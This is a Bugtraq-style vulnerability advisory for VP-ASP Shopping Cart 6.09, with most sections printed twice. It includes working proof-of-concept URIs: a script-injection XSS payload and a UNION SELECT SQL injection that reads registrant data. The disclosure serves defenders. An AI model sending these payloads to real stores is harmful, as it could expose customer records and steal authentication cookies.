VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
BID:22018
Info
VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 22018 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2007 12:00AM |
| Updated: | Jan 12 2007 05:50PM |
| Credit: | ajann is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
VP-ASP Shopping Cart 6.09 |
| Not Vulnerable: | |
Discussion
VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
VP-ASP Shopping Cart is prone to multiple input-validation vulnerabilities, including a SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerability in the underlying database implementation.
VP-ASP Shopping Cart 6.09 is vulnerable to these issues.
VP-ASP Shopping Cart is prone to multiple input-validation vulnerabilities, including a SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerability in the underlying database implementation.
VP-ASP Shopping Cart 6.09 is vulnerable to these issues.
Exploit / POC
VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
To exploit a cross-site scritping issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URI is available:
http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E
To exploit an SQL-injection issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
To exploit a cross-site scritping issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URI is available:
http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E
To exploit an SQL-injection issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
Solution / Fix
VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].